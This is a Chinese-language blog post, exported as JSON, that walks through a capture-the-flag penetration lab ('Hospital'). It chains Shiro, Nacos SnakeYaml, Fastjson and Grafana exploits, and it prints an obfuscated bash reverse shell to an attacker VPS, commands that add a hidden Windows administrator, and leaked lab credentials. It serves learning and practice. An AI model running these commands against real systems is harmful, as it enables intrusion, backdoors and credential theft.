{"id":3072,"date":"2024-01-06T23:57:53","date_gmt":"2024-01-06T15:57:53","guid":{"rendered":"https:\/\/fushuling.com\/?p=3072"},"modified":"2024-01-07T00:01:07","modified_gmt":"2024-01-06T16:01:07","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83-hospital","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2024\/01\/06\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83-hospital\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Hospital"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Spring boot actuator unauthorized access<\/li>\n\n\n\n<li>shiro\u53cd\u5e8f\u5217\u5316RCE<\/li>\n\n\n\n<li>vim.basic\u63d0\u6743<\/li>\n\n\n\n<li>Nacos SnakeYaml\u53cd\u5e8f\u5217\u5316<\/li>\n\n\n\n<li>Fastjson<\/li>\n\n\n\n<li>Grafana\u4efb\u610f\u6587\u4ef6\u8bfb\u6f0f\u6d1e<\/li>\n\n\n\n<li>psql<\/li>\n<\/ul>\n\n\n\n<p>goby\u626b\u51fa\u6765\u6709Spring boot actuator unauthorized access\uff0c\u53ef\u4ee5\u770b<a href=\"https:\/\/www.freebuf.com\/news\/193509.html\">Springboot\u4e4bactuator\u914d\u7f6e\u4e0d\u5f53\u7684\u6f0f\u6d1e\u5229\u7528<\/a>\u600e\u4e48\u5229\u7528\uff0c\u53d1\u73b0\u6709heapdump\u6cc4\u9732\u3002\u56e0\u4e3a\u770b\u51fa\u6765\u662fshiro\uff0c\u7136\u540e\u7ffb\u5185\u5b58\uff0c\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\u662fadmin admin123\uff0c\u5f53\u7136\u767b\u8fdb\u53bb\u6ca1\u5565\u5375\u7528\uff0c\u540e\u9762\u60f3\u7ffbshiro key\uff0c\u76f4\u63a5\u641cg==\u7ed3\u5c3e\u7684\u5b57\u7b26\u4e32(\u770b\u522b\u4eba\u4f6c\u662f\u7528\u7684\u5185\u5b58\u5206\u6790\u5de5\u5177https:\/\/github.com\/whwlsfb\/JDumpSpider\uff0c\u6211\u8fd9\u4e2a\u662f\u7eaf\u9760\u7684\u7ecf\u9a8c)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u62ff\u5230shiro key\uff1aGAYysgMQhG7\/CzIJlVpR2g==\uff0c\u76f4\u63a5RCE(https:\/\/github.com\/SummerSec\/ShiroAttack2)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-4.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-4.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u7528\u65c1\u8fb9\u7684\u5185\u5b58\u9a6c\u529f\u80fd\u5199\u9a6c\u8fde\u4e0a\u53bb\uff0c\u5f39shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMzYueHh4Lnh4eC85MzgzIDA+JjE=}|{base64,-d}|{bash,-i}'<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-3.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-3.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>vim.basic\u6709suid\u6743\u9650\uff0c\u4f46\u662f\u5fc5\u987b\u6709tty\uff0c\u4e5f\u5c31\u662f\u4ea4\u4e92\u5f0fshell\uff0c\u6700\u7b80\u5355\u7684\u65b9\u6cd5\u5c31\u662f\u8f93\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n\n\n\n<p>\u5176\u4ed6\u7684\u5229\u7528\u53ef\u4ee5\u770b\u770b<a href=\"https:\/\/saucer-man.com\/information_security\/233.html\">\u5b9e\u73b0\u4ea4\u4e92\u5f0fshell\u7684\u51e0\u79cd\u65b9\u5f0f<\/a>\uff0c\u6211\u8fd9\u91cc\u7528\u7684\u662f\u4e4b\u524d<a href=\"https:\/\/fushuling.com\/index.php\/2023\/10\/21\/%e5%90%8e%e6%b8%97%e9%80%8f%e4%b9%8b%e6%96%87%e4%bb%b6%e4%b8%8b%e8%bd%bdlinux%e7%af%87\/\">\u540e\u6e17\u900f\u4e4b\u6587\u4ef6\u4e0b\u8f7d(Linux\u7bc7)<\/a>\u91cc\u63d0\u5230\u7684pwncat\u5b9e\u73b0tty\uff0c\u7b80\u76f4\u597d\u7528\u7684\u6279\u7206<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-1.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>vim.basic \/root\/flag\/flag01.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-2.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F02-2.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan -h 172.30.12.5\/24 -hn 172.30.12.5\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.3\nstart infoscan\n(icmp) Target 172.30.12.236   is alive\n(icmp) Target 172.30.12.6     is alive\n&#91;*] Icmp alive hosts len is: 2\n172.30.12.6:139 open\n172.30.12.6:135 open\n172.30.12.236:22 open\n172.30.12.6:8848 open\n172.30.12.236:8009 open\n172.30.12.236:8080 open\n172.30.12.6:445 open\n&#91;*] alive ports len is: 7\nstart vulscan\n&#91;*] NetBios 172.30.12.6     WORKGROUP\\SERVER02\n&#91;*] NetInfo\n&#91;*]172.30.12.6\n   &#91;-&gt;]Server02\n   &#91;-&gt;]172.30.12.6\n&#91;*] WebTitle http:\/\/172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 \u2013 Not Found\n&#91;*] WebTitle http:\/\/172.30.12.236:8080 code:200 len:3964   title:\u533b\u9662\u540e\u53f0\u7ba1\u7406\u5e73\u53f0\n&#91;+] PocScan http:\/\/172.30.12.6:8848 poc-yaml-alibaba-nacos\n&#91;+] PocScan http:\/\/172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass<\/code><\/pre>\n\n\n\n<p>\u4e3a\u4e86\u8fdb\u4e00\u6b65\u5229\u7528\uff0c\u8fd9\u91cc\u76f4\u63a5\u7528vim.basic\u5199\u516c\u94a5\u83b7\u5f97root\u6743\u9650\u3002<\/p>\n\n\n\n<p>\u5185\u7f51\u7684172.30.12.6:8848\u662fNacos\uff0c\u53ef\u4ee5\u6253SnakeYaml\uff0c\u4e0b\u4e00\u4e2a<a href=\"https:\/\/github.com\/charonlight\/NacosExploitGUI\">charonlight\/NacosExploitGUI<\/a>\uff0c\u628aAwesomeScriptEngineFactory.java\u91cc\u6267\u884c\u7684\u547d\u4ee4\u6539\u6210\u52a0\u4e2a\u7ba1\u7406\u5458\u7528\u6237<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-15.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-15.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Runtime.getRuntime().exec(\"net user fushuling qwer1234! \/add\");\nRuntime.getRuntime().exec(\"net localgroup administrators fushuling \/add\")<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-4.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-4.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u8fd8\u6709\u73b0\u6210\u7684\u6253\u5305bat\uff0c\u633a\u597d\uff0c\u6253\u5305\u540e\u751f\u6210yaml-payload.jar\u3002\u56e0\u4e3aweb1\u5df2\u7ecf\u88ab\u5199\u516c\u94a5\u62ff\u5230root\u6743\u9650\u4e86(\u4e0d\u4f1a\u5199\u516c\u94a5\u7684\u8bdd\u53ef\u4ee5\u770b<a href=\"https:\/\/fushuling.com\/index.php\/2023\/10\/14\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7spoofing\/\">\u6625\u79cb\u4e91\u5883\u00b7Spoofing<\/a>)\uff0c\u6211\u4eec\u76f4\u63a5\u5f53\u4f5c\u653b\u51fb\u673a\uff0c\u628a\u6253\u5305\u597d\u7684jar\u6587\u4ef6\u4f20\u5230tmp\u76ee\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-16.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-16.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5728tmp\u76ee\u5f55\u8fd0\u884cpython3 -m http.server 80\u5f00\u542fweb\u670d\u52a1\uff0c\u63a5\u7740\u7528<a href=\"https:\/\/github.com\/charonlight\/NacosExploitGUI\">NacosExploitGUI<\/a>\u8ba9nacos\u670d\u52a1\u5668\u53bb\u4ece\u8fdc\u7a0b\u670d\u52a1\u5668\u52a0\u8f7d\u6076\u610f\u7684yaml-payload.jar\u5305<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-6.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-6.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6210\u529f\u6267\u884c\u7684\u8bdd\u5c31\u53ef\u4ee5\u7528\u6211\u4eec\u6dfb\u52a0\u7684\u8d26\u6237rdp\u4e0a\u53bb\u62ffflag\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-7.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-7.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>172.30.12.236:8080\u662f\u6253Fastjson\u53cd\u5e8f\u5217\u5316\uff0c\u8fd9\u91cc\u76f4\u63a5\u7528\u73b0\u6210\u7684\u63d2\u4ef6<a href=\"https:\/\/github.com\/amaz1ngday\/fastjson-exp\">amaz1ngday\/fastjson-exp<\/a>\uff0c\u6293\u767b\u5f55\u7684\u8bf7\u6c42\u5305\uff0c\u7136\u540e\u9009\u62e9\u64cd\u4f5c\uff0c\u518d\u9009\u62e9\u62d3\u5c55\uff0c\u65e0\u8bba\u662fsend to fastjsonEcho\u8fd8\u662fsend to fastjsonInject\u63d2\u4ef6\u90fd\u80fd\u68c0\u9a8c\u51fa\u6765\u7136\u540e\u5e2e\u4f60\u62ffshell<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-17.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-17.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u4e0d\u8fc7\u751f\u6210\u7684\u9a6c\u8fde\u4e0d\u4e0a\uff0c\u4f1a\u663e\u793ainitShellOpertion Fail\uff0c\u56e0\u4e3a\u76ee\u6807\u5f00\u542f\u4e86session\u6301\u4e45\u5316\uff0c\u5e76\u4e14\u6211\u4eec\u5411session\u5b58\u5165\u4e86\u4e0d\u53ef\u88ab\u53cd\u5e8f\u5217\u5316\u7684\u6570\u636e\uff0c\u5bfc\u81f4\u540e\u7eed\u4f7f\u7528\u6b64session\u6211\u4eec\u65e0\u6cd5\u83b7\u53d6\u5230\u4e4b\u524d\u5b58\u5165\u7684\u6570\u636e\uff0c\u89e3\u51b3\u529e\u6cd5\u662f\u628a\u751f\u6210\u7684shell\u4e2d\u7684session\u66ff\u6362\u6210application\uff0c\u4f46\u4ed6\u8fd9\u4e2a\u8bf7\u6c42\u6211\u6ca1\u600e\u4e48\u770b\u61c2\uff0c\u6539\u4e0d\u6765\u3002\u4f46\u8fd9\u4e2a\u63d2\u4ef6\u53ef\u4ee5\u76f4\u63a5\u5728\u6d88\u606f\u8bf7\u6c42\u5934\u90a3\u91cc\u6267\u884c\u547d\u4ee4\u7136\u540e\u62ff\u5230\u6267\u884c\u7ed3\u679c\uff0c\u6240\u4ee5\u4e5f\u4e0d\u7528\u8fde\u4e0a\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-8.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-8.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u6211\u628aroot\u5bc6\u7801\u6539\u4e86\u5728web1\u8fd9\u53f0\u673a\u5668\u4e0assh\u5230\u4e86web3\u7684\u673a\u5668\uff0c\u63a5\u7740\u53d1\u73b0\u662f\u53cc\u7f51\u5361<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-10.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-10.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>Grafana\u5b58\u5728<a href=\"https:\/\/github.com\/A-D-Team\/grafanaExp\/releases\/tag\/V1.1\">CVE-2021-43798<\/a>\uff0c\u8fd9\u91cc\u6709\u70b9\u9ebb\u70e6\u7684\u5730\u65b9\u5728\u4e8e\u5185\u7f51\u7684\u673a\u5668\u4e0d\u51fa\u7f51(\u597d\u50cf\u662f\u5e9f\u8bdd\uff1f)\uff0c\u4f46\u6211\u4eec\u53ef\u4ee5\u5229\u7528web1\uff0c\u56e0\u4e3a\u4e4b\u524d\u5728web1\u5f00\u4e86web\u670d\u52a1\uff0c\u6211\u4eec\u628a\u9700\u8981\u7684\u6587\u4ef6\u653eweb1\u4e0a\uff0c\u5728web3\u4e0awget web1\u5c31\u80fd\u5b9e\u73b0\u6587\u4ef6\u4f20\u8f93\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-11.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-11.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/grafanaExp_linux_amd64 exp -u http:\/\/172.30.54.12:3000\r\n2024\/01\/06 20:36:23 Target vulnerable has plugin &#91;alertlist]\r\n2024\/01\/06 20:36:23 Got secret_key &#91;SW2YcwTIb9zpOOhoPsMm]\r\n2024\/01\/06 20:36:23 There is &#91;0] records in db.\r\n2024\/01\/06 20:36:24 type:&#91;postgres]\tname:&#91;PostgreSQL]\t\turl:&#91;localhost:5432]\tuser:&#91;postgres]\tpassword&#91;Postgres@123]\tdatabase:&#91;postgres]\tbasic_auth_user:&#91;]\tbasic_auth_password:&#91;]\r\n2024\/01\/06 20:36:24 All Done, have nice day!<\/code><\/pre>\n\n\n\n<p>172.30.54.x\u8fd9\u4e2a\u65b0\u7f51\u6bb5\u7528\u6211\u4eec\u4e4b\u524d\u5728web1\u4e0a\u5efa\u7acb\u7684\u4ee3\u7406\u662f\u8bbf\u95ee\u4e0d\u8fc7\u53bb\uff0c\u5f97\u5efa\u7acb\u591a\u91cd\u4ee3\u7406\uff0c\u53ef\u4ee5\u770b\u770b<a href=\"https:\/\/fushuling.com\/index.php\/2023\/09\/21\/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba\/\">\u5185\u7f51\u4ee3\u7406\u642d\u5efa<\/a>\uff0c\u6211\u7528\u7684Stowaway\uff0c\u633a\u65b9\u4fbf\u7684\uff0c\u8fd8\u662f\u5728\u6211\u4eec\u81ea\u5df1\u7684VPS\u4e0a\uff0cuse 0\u9009\u62e9node 0\u540e(\u4e5f\u5c31\u662fweb1\u670d\u52a1\u5668)\uff0c\u7136\u540e\u9009\u62e9listen\uff0c\u518d\u8f93\u51651\uff0c\u9009\u62e9\u6a21\u5f0f\uff0c\u8f93\u51651234\uff0c\u9009\u62e9\u76d1\u542c\u7aef\u53e3<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-18.jpg'><img class=\"lazyload lazyload-style-1\" 